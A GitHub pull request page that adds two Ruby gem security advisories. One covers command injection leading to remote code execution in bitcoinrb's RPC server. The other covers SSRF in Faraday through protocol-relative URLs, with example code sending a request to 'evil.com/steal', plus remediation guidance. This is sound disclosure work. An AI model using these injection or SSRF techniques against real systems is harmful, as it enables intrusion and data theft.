Skip to content

GHSA SYNC: 2 brand new advisories #991

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
postmodern merged 3 commits into from
Feb 11, 2026
+120 −0
Merged

GHSA SYNC: 2 brand new advisories #991

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
a1c93d4
GHSA SYNC: 2 brand new advisories
jasnow Feb 11, 2026
bdf8d0f
Add another advisory link for CVE-2026-25765
jasnow Feb 11, 2026
995b88d
removed blank line
jasnow Feb 11, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
45 changes: 45 additions & 0 deletions gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
---
gem: bitcoinrb
ghsa: q66h-m87m-j2q6
url: https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
title: Bitcoinrb Vulnerable to Command injection via RPC
date: 2026-02-10
description: |
### Summary: Remote Code Execution

Unsafe handling of request parameters in the RPC HTTP server
results in command injection.

### Details

In lib/bitcoin/rpc/http_server.rb line 30-39, the JSON body of a
POST request is parsed into `command` and `args` variables. These
values are then passed to `send`, which is used to call an arbitrary
class method. However, there is no validation that the provided
`command` value is one of the expected RPC methods.
This means that an attacker could supply a `command` value such
as `system`, and then pass arbitrary system commands into the
`args` parameter and achieve remote code execution.

### Remediation

**Mitigating Factors:**

- The RPC server is part of the experimental SPV node feature,
which is not documented and has very few users.
- The SPV-related features may be removed in future releases.

**Resolution:**

- Added whitelist validation to allow only RPC methods defined
in `RequestHandler`.

- Fixed in version 1.12.0.
patched_versions:
- ">= 1.12.0"
related:
url:
- https://github.com/chaintope/bitcoinrb/releases/tag/v1.12.0
- https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
- https://github.com/chaintope/bitcoinrb/commit/070327133a2a3e5a6d265b2d82f06f9414c01e74
- https://github.com/advisories/GHSA-q66h-m87m-j2q6
75 changes: 75 additions & 0 deletions gems/faraday/CVE-2026-25765.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,75 @@
---
gem: faraday
cve: 2026-25765
ghsa: 33mh-2634-fwr2
url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
title: Faraday affected by SSRF via protocol-relative URL host
override in build_exclusive_url
date: 2026-02-09
description: |
### Impact

Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)
uses Ruby's `URI#merge` to combine the connection's base URL with
a user-supplied path. Per RFC 3986, protocol-relative URLs
(e.g. `//evil.com/path`) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to
Faraday's `get()`, `post()`, `build_url()`, or other request
methods, an attacker can supply a protocol-relative URL like
`//attacker.com/endpoint` to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts
URLs starting with `/`, so protocol-relative URLs bypass it entirely.

**Example**
```ruby
conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com
```

### Patches

Faraday v2.14.1 is patched against this security issue. All
versions of Faraday up to 2.14.0 are affected.

### Workarounds

**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action
to mitigate this issue, however should that not be an option
please continue reading.**

Applications should validate and sanitize any user-controlled
input before passing it to Faraday request methods.
Specifically:

- Reject or strip input that starts with // followed by a
non-/ character.
- Use an allowlist of permitted path prefixes.
- Alternatively, prepend ./ to all user-supplied paths before
passing them to Faraday.

Example validation:
```ruby
def safe_path(user_input)
raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]})
user_input
end
```
cvss_v3: 5.8
patched_versions:
- ">= 2.14.1"
related:
url:
- https://nvd.nist.gov/vuln/detail/CVE-2026-25765
- https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
- https://github.com/lostisland/faraday/releases/tag/v2.14.1
- https://github.com/lostisland/faraday/pull/1569
- https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc
- https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2
- https://www.rfc-editor.org/rfc/rfc3986#section-5.4
- https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765
- https://github.com/advisories/GHSA-33mh-2634-fwr2